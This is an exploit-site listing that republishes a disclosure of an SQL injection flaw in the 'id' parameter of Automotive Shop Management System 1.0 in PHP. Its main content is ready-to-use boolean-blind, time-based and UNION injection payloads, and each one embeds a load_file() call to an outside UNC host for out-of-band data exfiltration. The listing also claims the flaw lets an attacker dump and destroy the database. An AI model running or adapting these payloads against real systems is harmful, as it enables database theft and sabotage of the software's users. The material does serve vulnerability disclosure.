Advertisement






Automotive Shop Management System 1.0 SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2022-12-05
CVSS
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120008

Below is a copy:

Automotive Shop Management System 1.0 SQL Injection
## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi
## Author: nu11secur1ty
## Date: 12.03.2022
## Vendor: https://github.com/oretnom23,
https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
The attacker can dump all database information without any problems,
and then he can destroy this system, it is depending
from the scenario.

## STATUS: Critically awful

[+] Payload:

```MySQL
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
OR NOT 9828=9828 AND 'NWsG'='NWsG

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=7'+(select
load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''
UNION ALL SELECT
NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)

## Proof and Exploit:
[href](https://streamable.com/c5v75u)

## Time spent
`00:27:00`

## Time attack
`00:01:57`

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.